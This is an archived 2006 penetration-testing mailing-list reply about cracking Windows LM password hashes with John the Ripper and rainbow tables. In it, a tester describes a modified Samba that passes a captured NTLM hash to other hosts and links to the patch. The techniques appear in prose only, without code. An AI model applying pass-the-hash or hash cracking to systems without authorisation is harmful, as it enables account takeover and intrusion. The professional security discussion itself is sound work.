Penetration Testing mailing list archives

Re: Windows XP / 2K3 Default Users

From: jmk <jmk () foofus net>
Date: Wed, 01 Nov 2006 09:34:16 -0600

On Tue, 2006-10-31 at 17:27 -0700, Thor (Hammer of God) wrote:

Maybe I'm just in a different environment, but when I see people report
"routine" cracking SAM's, it really makes we wonder who the client-base is.
I think the last time I was paid for any work with LM cracking was over 10
years ago.  I've been turning off LM since Win2k came out, and have been
telling people to use pass-phrases instead of passwords since Win2000
allowed 126 character passcodes. Even something as simple as "my dog has
fleas" couldn't be rainbow cracked with anything I've seen out there.  Of
course, when you have a pass phrase like "OK, this is my passphrase--crack
THIS 1 homeboy!" Then the whole thing goes out the window.

That's what I was on about- while I think rainbow tables are neat, I've
really not had much use for them given their size, having to have admin
access to get the SAM anyway (for win machines) and how easy it is to thwart
them.  But that's just me ;)


Unfortunately, it seems that the vast majority of clients I work with
still have LM hashes enabled and usually some relatively weak passwords.
John typically is able to crack the passwords quickly and, when it
can't, Rainbow tables work. I'm hopeful that we're slowly getting them
educated though.

We did run into a situation recently where a compromised workstation
contained an interesting account with only a NTLM hash. In order to use
that hash against other hosts, I've modified Samba to simply pass it.
Samba's "net" command can do lots of cool stuff, like add local user
accounts. My updated patch is available, if anyone wants it:

http://www.foofus.net/jmk/passhash.html

Joe


-- 
jmk <jmk () foofus net>
Foofus Networks


------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

Current thread:

Re: Windows XP / 2K3 Default Users Lee Lawson (Nov 01)
- <Possible follow-ups>
- Re: Windows XP / 2K3 Default Users Peter Wood (Nov 01)
- Re: Windows XP / 2K3 Default Users jmk (Nov 01)
  - Re: Windows XP / 2K3 Default Users Ivan Arce (Nov 01)
    - Small hardware network sniffer - does it exist? Petr . Kazil (Nov 02)
    - RE: Small hardware network sniffer - does it exist? Marc (Nov 02)
    - Re: Small hardware network sniffer - does it exist? Matthew Leeds (Nov 02)
    - RE: Small hardware network sniffer - does it exist? Clemens, Dan (Nov 02)
    - Re: Small hardware network sniffer - does it exist? FocusHacks (Nov 02)
    - Re: Small hardware network sniffer - does it exist? Javier Reyna Padilla (Nov 04)
    - Re: Small hardware network sniffer - does it exist? - yup Alvin Oga (Nov 06)
    - RE: Small hardware network sniffer - does it exist? Isaac Van Name (Nov 06)
    - Re: Small hardware network sniffer - does it exist? Ivan . (Nov 07)

(Thread continues...)